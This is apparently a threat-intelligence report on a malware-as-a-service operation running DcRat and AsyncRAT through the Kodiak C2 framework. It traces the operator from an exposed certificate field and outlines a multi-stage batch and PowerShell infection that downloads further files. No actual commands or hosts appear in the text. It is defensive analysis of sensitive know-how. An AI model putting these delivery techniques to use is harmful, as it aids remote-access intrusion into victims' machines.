MALWARE AS A SERVICE OPERATION USING DCRAT & ASYNC-RAT
Intelligence
Two malicious IP addresses have been identified, indicating the hosting and operation of Remote Access Trojans (RATs). This discovery highlights the presence of malicious infrastructure actively supporting unauthorized remote access activities.
Initial Investigation
Leveraging the capabilities of Censys, our analysts initiated a comprehensive investigation to trace the entirety of the malware infrastructure. By analyzing network patterns and asset associations, they were able to map the malicious ecosystem, providing critical insights into its architecture and operational reach.
Through the search engine platform, analysts observed anomalous open ports and labels such as 'DcRat' and references to other Remote Access Trojans (RATs).
Further analysis revealed an operational oversight by the threat actor, where the Common Name (CN) field in the SSL/TLS certificate contained their username, inadvertently exposing their identity.
With the username the analysts we able to find the github profile as well as the exact malware DCRAT in the repository.
Upon identifying the threat actor's portfolio website, analysts successfully uncovered communication channels associated with the individual, providing valuable opportunities to gain further insights into their operations.
Something didnt add up when the analysts so the below image in the DCRAT github repo.
So basically ‘qwqdanchun’ is not our threat actor but he is the main developer of this malware and is not responsible of the malware operation.
Advancing the malware as a Service Operation
In this operation, the threat actors utilized the Kodiak open-source Command and Control (C2) framework to generate payloads designed for embedding within the Remote Access Trojans (RATs). Among the recovered artifacts, analysts identified a batch script payload, offering critical insight into the adversary's tactics and techniques.
The powershell command which executes when the victim runs the batch script
Malware Analysis
Upon executing the batch script generated by the Kodiak framework, the payload initiates a connection to a specified domain to download additional malicious components, including a PDF file, another batch script named 'startuppp.bat,' and several ZIP archives. This activity highlights the multi-stage delivery mechanism employed by the threat actors.
The domain the threat actors use to download the second stage payload into the victims machine.
Conclusion
The investigation revealed a sophisticated Malware-as-a-Service (MaaS) operation leveraging the Kodiak open-source Command and Control (C2) framework to deploy Remote Access Trojans (RATs) and associated payloads. Analysts uncovered critical intelligence, including the identification of malicious IP addresses, open ports with RAT indicators, and operational missteps by the threat actor, such as exposing their username in SSL/TLS certificate fields.
Furthermore, the threat actor’s infrastructure included a portfolio website and accessible communication channels, providing deeper insights into their operations. The payload analysis demonstrated a multi-stage infection strategy, involving the download of additional malicious files such as batch scripts, PDFs, and compressed archives.
These findings underscore the advanced tactics and adaptive methodologies employed by the threat actor, reinforcing the necessity of robust threat hunting and proactive security measures to mitigate such threats. This intelligence offers actionable insights to enhance organizational defenses and disrupt malicious operations effectively.
